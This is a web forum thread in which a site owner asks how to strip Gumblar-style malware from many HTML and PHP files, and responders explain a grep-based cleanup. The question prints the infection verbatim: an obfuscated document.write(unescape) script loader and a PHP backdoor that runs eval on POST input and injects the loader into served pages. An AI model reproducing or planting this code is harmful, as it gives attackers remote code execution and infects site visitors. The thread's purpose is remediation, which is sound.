Solved

remove document.write unescape References

Posted on 2009-05-20
Last Modified: 2013-12-06
Do you have an application that will allow me to remove the following types of viruses from my html/php files?

VIRUSES:

1) something to do with GUMBLAR code
2) How to remove document.write unescape References?

<script language=javascript><!--
document.write(unescape('%3CscpGhrpGhig8Lpt%20gPhsrT8c%3D%2F%2Fm894T8%2E2pGh47%2E2%2ET8195e2q%2FjqugPhepGhrT8yg8L%2ET8jspGh%3ET8%3C%2FzOMscripe2qtzOM%3E').replace(/e2q|zOM|T8|gPh|g8L|m8|pGh/g,""));
 --></script>

3) FROM PHP FILES following junk coding... added to my codes

<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaXRlKHVuZXNjYXBlKCclM0NzY3BHaHJwR2hpZzhMcHQlMjBnUGhzclQ4YyUzRCUyRiUyRm04OTRUOCUyRTJwR2g0NyUyRTIlMkVUODE5NWUycSUyRmpxdWdQaGVwR2hyVDh5ZzhMJTJFVDhqc3BHaCUzRVQ4JTNDJTJGek9Nc2NyaXBlMnF0ek9NJTNFJykucmVwbGFjZSgvZTJxfHpPTXxUOHxnUGh8ZzhMfG04fHBHaC9nLCIiKSk7CiAtLT48L3NjcmlwdD4='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>


If you have something to remove these types of viruses please let me know. I have over 200 main folders and many sub and sub folders under it which are infected by such. If I sit manually to remove this from all it will take me a very long time. Please advise. I have the files on a web server as well as on my local computer hard drive.

Thanks & Regards
Question by:shahja9
 
LVL 41

Expert Comment

by:HonorGod
ID: 24433066

If you have grep on your system, you could:

- Locate files containing "write(unescape", or  "function_exists('tmp",

- Then, you could use "grep -v" to process the file, and keep every line except those that contain the offending text...

grep -v "write\(unescape" myFile.html >myFile.new

The result of this should be the contents of "myFile.html" being copied to the output file (myFile.new) without the matching line
0
 
LVL 41

Expert Comment

by:HonorGod
ID: 24433079
If the offending text spans more than one line, we would have to do something a little more complicated.

Let me know.
0
 
LVL 41

Expert Comment

by:HonorGod
ID: 24433102
If you need grep for Windows, I found this one recently.  It has been around for awhile, but appears to be stable for all of the things for which I have used it.

http://pages.interlog.com/~tcharron/grep.html
0
 
LVL 41

Expert Comment

by:HonorGod
ID: 24433129
The neat thing about grep is that you could use it to locate the files containing the offending text, and output this to a ".bat" or ".sh" file, then use a good editor to take this list of files and change the file name to be an invocation of grep to process the input file, and remove the offending text, then execute the modified script file.  

That's how I would do it.
0
 

Author Comment

by:shahja9
ID: 24433315
Hi

Thanks for the prompt reply. I am sorry I am very new to this virus. Do I check this on the web server or on my local backup. I have taken the entire backup of the files that are on the web server on my hard disk. It is over 12 gig. Now please suggest me the best, easiest and quickest solution to get rid of the virus "junk" coding. I have never used grep...please help
Regards

0
 
LVL 41

Expert Comment

by:HonorGod
ID: 24433400
For example:

- Open a command prompt to the main directory/folder
- Use grep to find all the files containing the

  grep -SL "write\(unescape" *.html >grep.out

- Use a good editor (e.g., this worked in slickedit (VI mode) for me )

:%s/^(.*).html$/grep -v "write(unescape" \1.html >\1.out/

- Rename the file to have a suitable script extension (either .bat, or .sh)
- If you're on a Unix type system, make the script executable
- execute the script
- Check some of the *.out files

I would then consider building another script file to "rename" the *.out to *.html for each of the processed files
0
 
LVL 41

Expert Comment

by:HonorGod
ID: 24433502
Do you have grep?

To find out type the following at a command prompt:

grep -?

If you get some "help" type output, it is available.
If not, you are going to have to find/install one.

What operating system are you using?

I would certainly use grep to check to see if any of your backups files are infected
0
 
LVL 41

Expert Comment

by:HonorGod
ID: 24434146
If you don't have grep installed, do you have Python, or Perl?
0
 

Author Comment

by:shahja9
ID: 24436005
I installed grep.
I found the files that are infected. Now how do I auto clean it... with a script.. please can someone provide me the script and instructions?
Regards
0
 
LVL 41

Accepted Solution

by:
HonorGod earned 250 total points
ID: 24436223
Sure. Does the grep that you have allow you to specify "-S" to search sub-directories?  How about "-L" to only list file names containing the matching string?

So, can you use something like:

grep -SL "write\(unescape" *.html >grep.out

to find all of the files infected with that particular sequence of characters?

Look in the grep.out that is created.  You should have 1 line for each infected file.

What editor do you have?

Edit grep.out, and:

insert the following at the beginning of every line:

grep -v "write\(unescape"

remember to have a space after the closing double-quote.
So, each line should look like:

grep -v "write\(unescape" fileName01.html
grep -v "write\(unescape" fileName02.html
...

Append " >" (without the quote) to the end of each line...

Does your editor allow you to select, and copy a column of characters?
Select all of the file name portions of each line (they should all start in the same column), and append the filename block to the end of the line.  This makes each line look like:

grep -v "write\(unescape" fileName01.html >fileName01.html
grep -v "write\(unescape" fileName02.html >fileName02.html
...

Then, change the last part of each line from .html to something else, e.g., .out
which makes the file look like:

grep -v "write\(unescape" fileName01.html >fileName01.out
grep -v "write\(unescape" fileName02.html >fileName02.out
...


I presume that you are using Windows.  Is that correct?

rename grep.out fix.bat

Then, you should be able to execute:

fix

and see each grep command get executed.

By the way, since you have 1 line for each infected file, how many lines (infected files) do you have?
0
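The injected JavaScript in the question spans three lines, so removing only the `document.write(unescape` line leaves its `<script>` wrapper behind, and the PHP files carry a second injected block. The following Python sketch is an added example, not code from this thread: it removes both whole blocks recursively. The two regular expressions are assumptions derived from the samples in the question, and `clean_text`, `clean_tree` and the backup directory are hypothetical names.

```python
import re
import shutil
import sys
from pathlib import Path

# The three-line <script> wrapper around document.write(unescape(...)) from the question.
JS_BLOCK = re.compile(
    r"<script language=javascript><!--\s*document\.write\(unescape\(.*?-->\s*</script>\s*",
    re.IGNORECASE | re.DOTALL)
# The injected <?php ... ?> section: opens with the function_exists('tmp_...') guard
# and ends with a bare call to one of its tmp_ functions.
PHP_BLOCK = re.compile(
    r"<\?php\s+if\(!function_exists\('tmp_\w+'\)\)\{.*?tmp_\w+\(\);\s*\?>\s*",
    re.DOTALL)

def clean_text(text):
    """Return (cleaned_text, blocks_removed) for one file's contents."""
    text, n_php = PHP_BLOCK.subn("", text)
    text, n_js = JS_BLOCK.subn("", text)
    return text, n_php + n_js

def clean_tree(root, backup_dir, suffixes=(".html", ".htm", ".php")):
    """Clean files under root in place; originals are copied to backup_dir first.

    backup_dir should sit outside the web root so the infected copies are not served.
    """
    root, backup_dir = Path(root), Path(backup_dir)
    cleaned = []
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in suffixes:
            continue
        # latin-1 maps every byte to one character, so untouched bytes round-trip.
        text = path.read_bytes().decode("latin-1")
        new_text, count = clean_text(text)
        if count:
            saved = backup_dir / path.relative_to(root)
            saved.parent.mkdir(parents=True, exist_ok=True)
            shutil.copy2(path, saved)
            path.write_bytes(new_text.encode("latin-1"))
            cleaned.append((str(path.relative_to(root)), count))
    return cleaned

if __name__ == "__main__":
    # Usage: python clean_injected.py <site_root> <backup_dir>
    for name, count in clean_tree(sys.argv[1], sys.argv[2]):
        print(f"{count} block(s) removed: {name}")
```

Only blocks matching the two samples are removed; a variant with a different wrapper needs its own pattern, so search the tree again afterwards to confirm nothing remains.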
 
LVL 82

Assisted Solution

by:hielo
hielo earned 250 total points
ID: 24708115
0
